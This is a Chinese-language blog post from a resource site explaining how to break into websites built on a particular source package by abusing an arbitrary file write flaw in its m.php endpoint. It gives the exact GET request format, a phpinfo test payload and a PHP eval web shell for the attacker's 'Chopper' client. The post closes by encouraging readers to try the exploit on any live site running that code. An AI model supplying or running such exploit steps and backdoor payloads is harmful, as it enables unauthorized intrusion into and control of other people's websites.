麋鹿资源网
当前位置:首页 > 网络安全

【麋鹿】利用源码漏洞教你入侵网站

10-21   麋鹿站长   38787   0
话不多说,先讲一下这个漏洞
其实就是一个文件写入漏洞,我利用了这个漏洞写入了后门,就是这个API接口的漏洞
这源码里面的m.php文件可以任意写入文件

可以看到msb是文件名,msg这些参数是写入文件里面的,
使用get类型提交m.php?msb=kele&msg=测试,然后提交就会在/ipa/目录下多了个kele.php的文件,里面也有测试两个字
那么我把他换成<?php phpinfo();?>呢

然后再打开/ipa/kele.php文件
可以看到已经执行了php代码,然后在换成后门代码
<?php @eval($_POST['kele']); ?>
然后在用菜刀连接就好了[滑稽]
这就是个任意文件写入漏洞,看到这个源码搭建的站可以试试利用这个漏洞







标签:web渗透  网络安全  入侵  
相关评论

免责声明:本网站所发布的全部内容都来源于互联网搬运

请你在下载后的24小时内进行删除处理,如果有侵权之处请第一时间联系我们删除。敬请谅解! E-mail:2113295600@qq.com

麋鹿版权所有Copyright © 2021-2021